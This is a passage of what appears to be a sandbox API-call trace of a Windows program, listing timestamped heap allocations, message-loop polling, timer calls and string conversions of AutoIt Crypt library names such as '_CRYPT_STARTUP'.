0x2e54d88 [0265.148] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b80 [0265.148] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78bb8 [0265.148] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0265.148] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518f8 [0265.148] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0265.148] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a60 [0265.148] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ac0 [0265.148] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f58 [0265.148] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543a0 [0265.148] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51af0 [0265.148] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0265.148] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b08 [0265.148] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51940 [0265.148] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518f8 | out: hHeap=0x970000) returned 1 [0265.148] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0265.148] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a60 | out: hHeap=0x970000) returned 1 [0265.148] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0265.148] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b20 [0265.149] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0265.149] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51988 [0265.149] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a18 [0265.149] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f68 [0265.149] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54288 [0265.149] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518f8 [0265.149] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f88 [0265.149] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a30 [0265.149] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518c8 [0265.149] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b20 | out: hHeap=0x970000) returned 1 [0265.149] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0265.149] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51988 | out: hHeap=0x970000) returned 1 [0265.149] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0265.149] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a00 [0265.149] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0265.149] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b50 [0265.149] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b98 [0265.149] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ff8 [0265.149] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54120 [0265.149] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b38 [0265.281] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55008 [0265.281] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b20 [0265.281] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51988 [0265.281] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a00 | out: hHeap=0x970000) returned 1 [0265.281] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0265.281] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b50 | out: hHeap=0x970000) returned 1 [0265.281] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0265.281] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519a0 [0265.281] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0265.281] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519a0 | out: hHeap=0x970000) returned 1 [0265.281] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54490 [0265.281] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519b8 [0265.281] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519a0 [0265.281] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550a8 [0265.282] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54238 [0265.282] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a48 [0265.282] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fe8 [0265.282] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a48 | out: hHeap=0x970000) returned 1 [0265.282] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543c8 [0265.282] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51910 [0265.282] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519d0 [0265.282] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54490 | out: hHeap=0x970000) returned 1 [0265.282] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0265.282] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519b8 | out: hHeap=0x970000) returned 1 [0265.282] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0265.282] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a00 [0265.282] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0265.282] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b50 [0265.282] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51aa8 [0265.282] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fa8 [0265.282] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54300 [0265.283] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519e8 [0265.283] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fb8 [0265.283] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a48 [0265.283] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a60 [0265.283] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a00 | out: hHeap=0x970000) returned 1 [0265.283] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0265.283] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b50 | out: hHeap=0x970000) returned 1 [0265.283] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0265.283] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e544e0 [0265.283] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0265.283] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0265.283] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e544e0 | out: hHeap=0x970000) returned 1 [0265.283] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0265.283] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e519b8 [0265.283] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0265.283] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0265.284] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0265.284] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55a40 [0265.284] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55038 [0265.284] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0265.284] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55a40 | out: hHeap=0x970000) returned 1 [0265.284] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0265.284] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51b50 [0265.284] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0265.284] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0265.284] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fc8 [0265.284] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f98 [0265.284] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0265.284] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0265.284] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0265.285] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b50 | out: hHeap=0x970000) returned 1 [0265.285] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55028 [0265.285] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69988 [0265.285] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0265.285] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0265.285] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0265.285] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77908 [0265.285] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0265.285] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77908 | out: hHeap=0x970000) returned 1 [0265.285] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0265.285] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55a40 [0265.285] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0265.285] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0265.285] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55a40 | out: hHeap=0x970000) returned 1 [0265.285] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0265.285] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51b50 [0265.285] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b70 [0265.285] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0265.285] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0265.285] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0265.286] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0265.286] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0265.286] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0265.286] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b70 | out: hHeap=0x970000) returned 1 [0265.286] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b50 | out: hHeap=0x970000) returned 1 [0265.286] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0265.286] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0265.286] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0265.286] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0265.286] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519b8 | out: hHeap=0x970000) returned 1 [0265.286] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0265.286] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77808 [0265.286] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0265.286] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0265.286] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0265.291] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e698c8 [0265.291] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e698c8 | out: hHeap=0x970000) returned 1 [0265.291] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0265.291] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0265.291] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77908 [0265.291] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 1 [0265.291] TranslateMessage (lpMsg=0x8cf3b8) returned 0 [0265.291] DispatchMessageW (lpMsg=0x8cf3b8) returned 0x0 [0265.291] KillTimer (hWnd=0x402c2, uIDEvent=0x1) returned 1 [0265.291] SetTimer (hWnd=0x402c2, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0265.291] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0265.291] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77908 | out: hHeap=0x970000) returned 1 [0265.291] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0265.291] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0265.291] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a78 [0265.291] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a90 [0265.291] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550c8 [0265.291] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55b20 [0265.292] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55018 [0265.292] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0265.292] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55b20 | out: hHeap=0x970000) returned 1 [0265.292] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0265.292] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e519b8 [0265.292] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78c00 [0265.292] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0265.292] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55108 [0265.292] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55018 [0265.292] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0265.292] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0265.292] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78c00 | out: hHeap=0x970000) returned 1 [0265.292] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519b8 | out: hHeap=0x970000) returned 1 [0265.292] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0265.292] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519b8 [0265.292] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f38 [0265.292] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a00 [0265.292] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0265.292] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ad8 [0265.292] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55028 [0265.292] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b50 [0265.292] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0265.292] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b68 [0265.292] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0265.292] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c28 [0265.292] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0265.293] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54260 [0265.293] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a78 | out: hHeap=0x970000) returned 1 [0265.293] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a78 [0265.293] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0265.293] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0265.293] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51dc0 [0265.293] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55058 [0265.293] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c58 [0265.293] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0265.293] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e38 [0265.293] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0265.293] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0265.293] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c70 [0265.293] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fc8 [0265.293] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51cd0 [0265.293] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0265.293] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0265.293] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54260 | out: hHeap=0x970000) returned 1 [0265.293] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e08 [0265.293] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f38 [0265.293] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0265.293] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e80 [0265.293] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550b8 [0265.293] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51cb8 [0265.293] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0265.293] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51eb0 [0265.293] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55018 [0265.294] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0265.294] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ce8 [0265.294] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55018 [0265.294] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c88 [0265.294] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0265.294] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d30 [0265.294] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55018 [0265.294] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0265.294] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e68 [0265.294] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550c8 [0265.294] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bf8 [0265.294] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0265.294] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bc8 [0265.294] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55098 [0265.294] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51be0 [0265.294] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d60 [0265.294] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550b8 [0265.294] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f28 [0265.294] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x153c2) returned 0xe65418 [0265.296] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0265.296] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0xe65418 | out: hHeap=0x970000) returned 1 [0265.298] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0265.298] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d60 | out: hHeap=0x970000) returned 1 [0265.298] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51be0 | out: hHeap=0x970000) returned 1 [0265.298] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0265.298] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51dd8 [0265.298] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550b8 [0265.298] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d00 [0265.298] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0265.298] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x80) returned 0x2e565e8 [0265.298] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0265.298] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51df0 [0265.298] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55018 [0265.298] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0265.298] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55108 [0265.298] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d78 [0265.298] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0265.299] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 